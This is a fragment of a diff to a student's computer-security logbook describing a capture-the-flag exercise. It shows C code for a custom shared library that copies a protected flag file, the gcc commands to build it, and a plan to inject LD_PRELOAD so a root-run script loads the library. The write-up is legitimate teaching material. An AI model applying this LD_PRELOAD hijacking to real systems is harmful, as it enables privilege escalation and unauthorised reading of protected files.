RafaelNTeixeira/ComputerSecurity/Logbooks/LOGBOOK4.md

     system("cat /flags/flag.txt > /tmp/myflag.txt");
     return 0;
 }

-gcc -fPIC -g -c myLIB.c

-gcc -shared -o myLIB.so.1.0.1 myLIB.o -lc
 ```

-6. Our main goal was to create our own custom dynamic link library (myLIB.c) and inject a EV LD_PRELOAD into `env` so that when the server runs `my_script` in root mode, that variable is exported.
+6. Our main goal was to create our own custom dynamic link library (myLIB.c) and inject a environment variable called LD_PRELOAD into `env` in the `/tmp` folder so that when the server runs `my_script.sh` in root mode, that variable is exported.
 After that, the `reader` runs.

 ```
 $ gcc -fPIC -g -c myLIB.c